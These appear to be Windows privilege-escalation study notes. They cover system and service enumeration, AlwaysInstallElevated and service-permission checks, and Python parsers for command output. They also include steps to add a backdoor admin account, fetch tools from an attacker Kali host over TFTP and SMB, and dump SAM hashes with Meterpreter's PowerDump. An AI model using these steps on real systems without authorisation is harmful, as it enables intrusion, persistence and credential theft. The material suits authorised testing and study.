In a Windows environment, escalating privileges starts with collecting information about the target system. Unfortunately this is less convenient than on Linux, especially when working from a shell: there is no single place to get everything from, and you will have to remember a number of separate tools and commands just to grab basic information about the system.

Below are some of the commands that should help.

INFORMATION COLLECTION

running user

What is my account name

C:\Users>whoami
svcorp\alice

Which groups am I in?

C:\Users\Public>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Group used for deny only                          
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Two things to read from this output: the user is a member of BUILTIN\Administrators, but the entry is marked "Group used for deny only", and the integrity label is Medium. That is a UAC-filtered token: the account is an administrator, but this process runs with the restricted half of the split token, so the next step is a UAC bypass or an elevated shell rather than a real privilege escalation. With a full administrator token the Administrators entry reads "Enabled group" and the label is High Mandatory Level (S-1-16-12288).
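As an added example (Python, not part of the original notes), a small parser for the whoami /groups output above that extracts the integrity level and tells a UAC-filtered administrator token apart from a full one. The sample text is a subset of the output shown above, embedded so the script runs offline; on a real host you would feed it the saved output of whoami /groups.

```python
import re

# Constructed sample: rows from the `whoami /groups` output above, embedded
# here so the parser runs offline. Column widths are as whoami prints them.
SAMPLE_WHOAMI_GROUPS = r"""
GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
"""

# A row is: <name> <type keyword> <SID> [attributes]. The name column may be
# separated from the type by a single space, so the type is matched by keyword.
ROW_RE = re.compile(
    r"^(?P<name>.+?)\s+"
    r"(?P<type>Well-known group|Alias|Group|User|Label|Unknown SID type)\s+"
    r"(?P<sid>S-1-[\d-]+)\s*(?P<attrs>.*)$")

# RID of the S-1-16-<rid> mandatory label SID -> integrity level name
INTEGRITY_LEVELS = {0: "Untrusted", 4096: "Low", 8192: "Medium",
                    8448: "Medium Plus", 12288: "High", 16384: "System"}


def parse_whoami_groups(text):
    """One dict per group row: name, type, sid, attrs (list of strings)."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.rstrip())
        if not m:
            continue
        row = m.groupdict()
        row["attrs"] = [a.strip() for a in row["attrs"].split(",") if a.strip()]
        rows.append(row)
    return rows


def integrity_level(rows):
    """RID of the Mandatory Label SID, or None if whoami printed none."""
    for row in rows:
        if row["sid"].startswith("S-1-16-"):
            return int(row["sid"].rsplit("-", 1)[1])
    return None


def admin_token_state(rows):
    """'none'     - not a member of the Administrators alias (S-1-5-32-544)
       'filtered' - member, but deny-only: the UAC split token
       'full'     - member and the group is enabled: an elevated token"""
    for row in rows:
        if row["sid"] == "S-1-5-32-544":
            if "Group used for deny only" in row["attrs"]:
                return "filtered"
            return "full" if "Enabled group" in row["attrs"] else "filtered"
    return "none"


def summarize(text):
    """Integrity level name, admin token state and plain group names."""
    rows = parse_whoami_groups(text)
    rid = integrity_level(rows)
    return {
        "integrity": INTEGRITY_LEVELS.get(rid, f"unknown ({rid})"),
        "admin": admin_token_state(rows),
        "groups": [r["name"] for r in rows if r["type"] != "Label"],
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_WHOAMI_GROUPS))
```

For the sample above summarize() reports integrity "Medium" and admin "filtered"; the same parser applied to an elevated shell's output reports "High" and "full".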

system information

C:\Users>systeminfo

Host Name:                 SVCLIENT08
OS Name:                   Microsoft Windows 10 Pro N
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00331-60000-00000-AA584
Original Install Date:     04/03/2019, 13:27:02
System Boot Time:          25/11/2020, 14:29:01
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
<SNIP>

operating system edition

On older versions such as Windows XP the EULA text names the edition (on newer builds rely on the OS Name and OS Version lines of systeminfo instead):

type C:\Windows\system32\eula.txt

NET COMMAND

create user

To add a local user and put it in the local Administrators group (both require administrative rights):

net user saitama P@ssw0rd196 /ADD
net localgroup administrators saitama /add

to view all the users

net users

view domain groups

C:\Windows>net group /domain

The request will be processed at a domain controller for domain svcorp.com.

Group Accounts for \\sv-dc01.svcorp.com

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*Company_Mail
...

view services

net start lists the services that are currently running; the services section below shows sample output.

net start

TRANSFER FILE

tftp

Start the TFTP service on the Kali machine:

$ sudo service atftpd start

Once it is running, pull the file from the TFTP server on the victim (-i selects binary transfer mode, which is required for executables):

C:\>tftp -i 192.168.119.178 GET winPEASx86.exe winPEASx86.exe

The files served are the ones in /srv/tftpd on the Kali machine. Note that the tftp client is an optional Windows feature that is not installed by default on Vista and later, so this only works on older targets or where it has been enabled.

smb

Alternatively, serve a directory from the Kali machine as an SMB share and map it on the victim as a drive letter (here with username kali and password kali):

net use m: \\192.168.119.178\folder1 /user:kali kali

When the work is done, remove the mapping:

net use m: /delete

ALWAYS INSTALL ELEVATED

If the AlwaysInstallElevated policy is set, any user can install a Windows Installer (.msi) package with SYSTEM privileges, so a malicious .msi yields a SYSTEM shell. The policy is only in effect when the value is 1 (0x1) under both the HKCU and the HKLM key:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
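An added example (Python, not from the original page): a check that reads the two reg query outputs and reports the policy as enabled only when both hives carry the value 1, handling the ERROR line reg prints when the key does not exist. The sample outputs are constructed, not captured from a real host.

```python
import re

# Constructed `reg query` outputs (not captured from a real host): the HKCU
# key has the value set, the HKLM key does not exist at all.
SAMPLE_HKCU = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

SAMPLE_HKLM_MISSING = r"""
ERROR: The system was unable to find the specified registry key or value.
"""

SAMPLE_HKLM_SET = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

# reg prints the value as "<name>    REG_DWORD    0x1"; accept hex or decimal.
VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$",
    re.IGNORECASE | re.MULTILINE)


def always_install_elevated_value(reg_output):
    """DWORD from one `reg query ... /v AlwaysInstallElevated` output, or None
    when the key or value is absent (reg prints an ERROR line instead)."""
    m = VALUE_RE.search(reg_output)
    return int(m.group(1), 0) if m else None


def always_install_elevated_enabled(hkcu_output, hklm_output):
    """The policy is only effective when BOTH hives carry the value 1; a
    single hive set to 1 is a common false positive."""
    return (always_install_elevated_value(hkcu_output) == 1
            and always_install_elevated_value(hklm_output) == 1)


if __name__ == "__main__":
    print("HKCU only:", always_install_elevated_enabled(SAMPLE_HKCU, SAMPLE_HKLM_MISSING))
    print("both set: ", always_install_elevated_enabled(SAMPLE_HKCU, SAMPLE_HKLM_SET))
```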

SERVICE

Enum information of all the services

This lists every service on the target with its state and, for running ones, the PID. The type= service syntax (with a space after the equals sign) works from XP SP1 onward.

C:\>sc queryex type= service

SERVICE_NAME: ALG
DISPLAY_NAME: Application Layer Gateway Service
        TYPE               : 10  WIN32_OWN_PROCESS 
        STATE              : 4  RUNNING 
                                (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0	(0x0)
        SERVICE_EXIT_CODE  : 0	(0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 964
        FLAGS              : 
<SNIP>

The services hosted by each process can also be obtained with tasklist /SVC, which maps every PID to the service names it hosts:

C:\>tasklist /SVC 

Image Name                   PID Services                                     
========================= ====== =============================================
System Idle Process            0 N/A                                          
System                         4 N/A                                          
smss.exe                     360 N/A                                          
csrss.exe                    408 N/A                                          
winlogon.exe                 432 N/A                                          
services.exe                 476 Eventlog, PlugPlay                           
lsass.exe                    488 SamSs                                        
svchost.exe                  664 RpcSs                                        
svchost.exe                  712 AudioSrv, Browser, CryptSvc, dmserver,       
                                 EventSystem, lanmanserver,                   
                                 lanmanworkstation, Messenger, Netman, Nla,   
                                 RasMan, Schedule, seclogon, SENS,            
                                 SharedAccess, ShellHWDetection, TapiSrv,     
                                 TermService, Themes, TrkWks, uploadmgr,      
                                 winmgmt                                      
svchost.exe                  760 Dnscache                                     
svchost.exe                  772 LmHosts, RemoteRegistry, WebClient           
alg.exe                      964 ALG                                          
snmp.exe                    1028 SNMP                                         
VGAuthService.exe           1052 VGAuthService                                

To view the running processes on the system:

C:\>tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0                         0         20 K
System                         4                         0        216 K
smss.exe                     360                         0        344 K
csrss.exe                    408                         0      1,864 K
winlogon.exe                 432                         0     40,668 K
services.exe                 476                         0     10,024 K
lsass.exe                    488                         0      4,520 K
svchost.exe                  664                         0      3,064 K
svchost.exe                  712                         0     22,688 K

The running services listed by display name, from net start:

C:\> net start

These Windows services are started:

   Application Layer Gateway Service
   COM+ Event System
   COM+ System Application
   Computer Browser
   Cryptographic Services
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Event Log
   FTP Publishing
   IIS Admin
   Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
   Logical Disk Manager
   Messenger
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Remote Access Connection Manager

To list all loaded drivers on the system:

C:\>DRIVERQUERY

Module Name  Display Name           Driver Type   Link Date             
============ ====================== ============= ======================
ACPI         Microsoft ACPI Driver  Kernel        8/29/2002 9:09:03 AM  
ACPIEC       ACPIEC                 Kernel        8/17/2001 9:57:55 PM  
AFD          AFD Networking Support Kernel        8/17/2011 2:49:53 PM  
agp440       Intel AGP Bus Filter   Kernel        8/17/2001 9:57:59 PM  
AsyncMac     RAS Asynchronous Media Kernel        8/17/2001 9:55:29 PM  
atapi        Standard IDE/ESDI Hard Kernel        8/29/2002 9:27:48 AM  
Atmarpc      ATM ARP Client Protoco Kernel        8/17/2001 9:46:40 PM  
audstub      Audio Stub Driver      Kernel        8/17/2001 9:59:40 PM  
Beep         Beep                   Kernel        8/17/2001 9:47:33 PM  
cbidf2k      cbidf2k                Kernel        8/17/2001 9:52:06 PM  
Cdaudio      Cdaudio                Kernel        8/17/2001 9:52:26 PM  
Cdfs         Cdfs                   File System   8/29/2002 9:58:50 AM  
Cdrom        CD-ROM Driver          Kernel        8/29/2002 9:27:55 AM  
CmBatt       Microsoft AC Adapter D Kernel        8/29/2002 9:09:04 AM  
Compbatt     Microsoft Composite Ba Kernel        8/17/2001 9:57:58 PM  
Disk         Disk Driver            Kernel        8/29/2002 9:27:56 AM  

wmic can list installed (MSI-registered) software with vendor and version, which is useful for spotting known-vulnerable versions. It might fail if the user does not have sufficient permission to run wmic, and wmic is deprecated on recent Windows builds.

wmic product get name, version, vendor

using PowerShell

The service list is also available from PowerShell:

Get-Service

service details

To obtain the state of a specific service:

C:\>sc query uploadmgr

SERVICE_NAME: uploadmgr
        TYPE               : 20  WIN32_SHARE_PROCESS 
        STATE              : 4  RUNNING 
                                (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0	(0x0)
        SERVICE_EXIT_CODE  : 0	(0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Configuration (start type, binary path and the account it runs as):

C:\>sc qc uploadmgr
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: uploadmgr
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k netsvcs  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : Upload Manager  
        DEPENDENCIES       : RPCSS  
        SERVICE_START_NAME : LocalSystem  

For a service hosted in svchost.exe, as here, BINARY_PATH_NAME only shows the host process; the code that actually runs is the DLL named by the ServiceDll value under HKLM\SYSTEM\CurrentControlSet\Services\uploadmgr\Parameters. For a stand-alone service the path is the executable itself, which is what the permission checks below need. Note also SERVICE_START_NAME: LocalSystem, i.e. the service runs as SYSTEM, so hijacking its binary gives full privileges.

script to check for permissions

First change to a directory where you have write permission, then run this one-liner. It writes the binary path of every service whose executable is not under system32 into permissions.txt:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> permissions.txt

Then run the following, which calls icacls on each path in permissions.txt to print its ACL:

for /f eol^=^"^ delims^=^" %a in (permissions.txt) do cmd.exe /c icacls "%a"

We are interested in services whose binary grants our group (typically BUILTIN\Users, Everyone or Authenticated Users) full control (F), modify (M) or write (W) access, or change (C) in older cacls output: a writable binary can simply be replaced with a payload that then runs under the service account. Unquoted paths containing spaces in this list are a second thing to look for, since a writable directory along such a path lets you plant a binary that is executed instead of the intended one.
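Added example (Python, not the page's own script): given the captured output of wmic service list full and of icacls for each binary, this performs the two checks described above offline. It flags unquoted paths with spaces, listing the file names Windows would try before the real executable, and binaries whose ACL grants a low-privilege group a write right. The wmic and icacls samples are constructed imitations carrying only the fields needed; the service names and paths are made up.

```python
import re

# Constructed sample data, not captured from a real host.
# Trimmed imitation of `wmic service list full` (Name, PathName, StartName).
SAMPLE_WMIC = r"""
Name=VulnAgent
PathName=C:\Program Files\Vuln Corp\Agent Service\agent.exe -run
StartName=LocalSystem

Name=GoodAgent
PathName="C:\Program Files\Good Corp\good.exe" -run
StartName=LocalSystem

Name=uploadmgr
PathName=C:\WINDOWS\System32\svchost.exe -k netsvcs
StartName=LocalSystem
"""
# Imitation of `icacls <binary>` output, keyed by the binary path.
SAMPLE_ICACLS = {
    r"C:\Program Files\Good Corp\good.exe": r"""
C:\Program Files\Good Corp\good.exe BUILTIN\Users:(I)(M)
                                   NT AUTHORITY\SYSTEM:(I)(F)
                                   BUILTIN\Administrators:(I)(F)
""",
    r"C:\Program Files\Vuln Corp\Agent Service\agent.exe": r"""
C:\Program Files\Vuln Corp\Agent Service\agent.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                   BUILTIN\Administrators:(I)(F)
                                                   BUILTIN\Users:(I)(RX)
""",
}
LOW_PRIV = {r"BUILTIN\Users", "Everyone", r"NT AUTHORITY\Authenticated Users",
            r"NT AUTHORITY\INTERACTIVE"}
# icacls simple and specific rights that allow changing the file
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "DC", "GA", "GW"}


def parse_wmic_services(text):
    """Split `wmic service list full` output into one dict per service."""
    services, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if cur:
                services.append(cur)
                cur = {}
            continue
        key, _, value = line.partition("=")
        cur[key] = value
    if cur:
        services.append(cur)
    return services


def executable_from_pathname(pathname):
    """(exe_path, quoted): strip the arguments from a service PathName."""
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end if end > 0 else None], True
    m = re.match(r"(.*?\.exe)\b", p, re.IGNORECASE)
    return (m.group(1) if m else p.split(" ")[0]), False


def unquoted_path_candidates(pathname):
    r"""For an unquoted path with spaces, the files CreateProcess tries before
    the real one, e.g. C:\Program.exe, C:\Program Files\Vuln.exe, ..."""
    exe, quoted = executable_from_pathname(pathname)
    if quoted or " " not in exe:
        return []
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def parse_icacls(output, path):
    """{principal: set(rights)} from `icacls <path>` output."""
    aces = {}
    for raw in output.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):  # first line carries the path
            line = line[len(path):].strip()
        m = re.match(r"^(.+?):((?:\([A-Z,]+\))+)$", line)
        if not m:
            continue
        rights = set()
        for group in re.findall(r"\(([A-Z,]+)\)", m.group(2)):
            rights.update(group.split(","))
        aces[m.group(1)] = rights
    return aces


def low_priv_writable(aces):
    """Low-privilege principals holding a write/modify right on the file."""
    return sorted(p for p, r in aces.items() if p in LOW_PRIV and r & WRITE_RIGHTS)


def triage_services(wmic_output, icacls_outputs):
    """Both checks over every non-system32 service: list of (service, finding)."""
    findings = []
    for svc in parse_wmic_services(wmic_output):
        pathname = svc.get("PathName", "")
        exe, _ = executable_from_pathname(pathname)
        if "system32" in exe.lower():  # same filter as the for-loop above
            continue
        for cand in unquoted_path_candidates(pathname):
            findings.append((svc["Name"], "unquoted path, plant " + cand))
        aces = parse_icacls(icacls_outputs.get(exe, ""), exe)
        for principal in low_priv_writable(aces):
            findings.append((svc["Name"], "binary writable by " + principal))
    return findings
```

Calling triage_services(SAMPLE_WMIC, SAMPLE_ICACLS) reports three plantable file names for VulnAgent (its path is unquoted) and a BUILTIN\Users modify right on GoodAgent's binary; uploadmgr is skipped because it lives under system32, as in the page's own filter. On a real host, feed it the saved wmic output and a dict of the icacls output per path.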

PowerShell

msf PowerDump.ps1

From a Meterpreter session, use the following commands to import the PowerDump script and execute it (it dumps the local SAM password hashes and needs elevated privileges):

meterpreter > powershell_import /home/kali/Desktop/wintools/Invoke-PowerDump.ps1

meterpreter > powershell_execute Invoke-PowerDump

SCHEDULED TASKS

all tasks - verbose

The following commands list every scheduled task on the system. The /v (verbose) form includes the command each task runs and the account it runs as, which is what matters here, but its output can be overwhelming. Look for enabled tasks that run as SYSTEM (or another privileged account) whose script or binary sits in a location you can write to.

schtasks /query /fo LIST /v
schtasks /query /fo LIST
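An added example (Python, not from the original notes) that tames the verbose listing: it parses the /fo LIST /v records and keeps only enabled tasks running as SYSTEM whose command lies outside the Windows directory, which are the ones worth an icacls check. The two task records are constructed and carry only a subset of the real fields.

```python
# Constructed imitation of `schtasks /query /fo LIST /v` output (two tasks,
# a subset of the real fields); not captured from a real host.
SAMPLE_SCHTASKS = r"""
Folder: \
HostName:                             SVCLIENT08
TaskName:                             \Backup Sync
Next Run Time:                        26/11/2020 02:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        25/11/2020 02:00:00
Last Result:                          0
Author:                               SVCORP\admin
Task To Run:                          C:\Scripts\backup.bat
Start In:                             C:\Scripts
Comment:                              N/A
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
Schedule Type:                        Daily

HostName:                             SVCLIENT08
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\defrag.exe -c -h -k -g -$
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
Schedule Type:                        Weekly
"""

# Spellings of the SYSTEM account seen in the "Run As User" field (upper-cased
# for comparison). Add local/domain admin accounts here if they matter to you.
PRIVILEGED = {"SYSTEM", r"NT AUTHORITY\SYSTEM", "LOCALSYSTEM"}


def parse_schtasks_list(text):
    """One dict per task record; records are separated by blank lines and the
    "Folder:" lines that precede a group of tasks are skipped."""
    tasks, cur = [], {}
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip():
            if cur:
                tasks.append(cur)
                cur = {}
            continue
        if line.startswith("Folder:"):
            continue
        key, sep, value = line.partition(":")  # split at the first colon only
        if sep:
            cur[key.strip()] = value.strip()
    if cur:
        tasks.append(cur)
    return tasks


def privileged_tasks_outside_windows(tasks, windir=r"C:\Windows"):
    """Enabled tasks running as SYSTEM whose command is not under the Windows
    directory: candidates for an icacls check of the script and its folder."""
    hits = []
    for t in tasks:
        if t.get("Scheduled Task State") != "Enabled":
            continue
        if t.get("Run As User", "").upper() not in PRIVILEGED:
            continue
        cmd = t.get("Task To Run", "")
        resolved = (cmd.lstrip('"').lower()
                    .replace("%windir%", windir.lower())
                    .replace("%systemroot%", windir.lower()))
        if resolved.startswith(windir.lower()):
            continue
        hits.append((t.get("TaskName", "?"), cmd))
    return hits


if __name__ == "__main__":
    for name, cmd in privileged_tasks_outside_windows(parse_schtasks_list(SAMPLE_SCHTASKS)):
        print(f"{name}: {cmd}")
```

For the sample this returns only \Backup Sync, which runs C:\Scripts\backup.bat as SYSTEM; the Defrag task is dropped because %windir% resolves to the Windows directory.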

DRIVERS

Installed Drivers

Run this from PowerShell, since it pipes driverquery's CSV output through PowerShell cmdlets (ConvertFrom-Csv, Select-Object):

driverquery.exe /v /fo csv | ConvertFrom-Csv | Select-Object 'Display Name', 'Start Mode', Path

View Driver Version

To get the version of a particular driver (here, any whose device name contains "udfs"):

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*udfs*"}

PS - View Driver Version

All signed drivers with their versions, for matching against known vulnerable driver versions:

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer

AUTO ELEVATE

Same policy keys as in the ALWAYS INSTALL ELEVATED section, queried without /v so that every value under the Installer key is listed (a missing key means the policy is not set):

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer


unsorted references

https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/
http://www.fuzzysecurity.com/tutorials/16.html
https://sushant747.gitbooks.io/total-oscp-guide/content/cmd.html
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
https://blog.adithyanak.com/oscp-preparation-guide
https://thor-sec.com/review/oscp/oscp_review/
https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md
http://0xc0ffee.io/blog/OSCP-Goldmine
https://guif.re/windowseop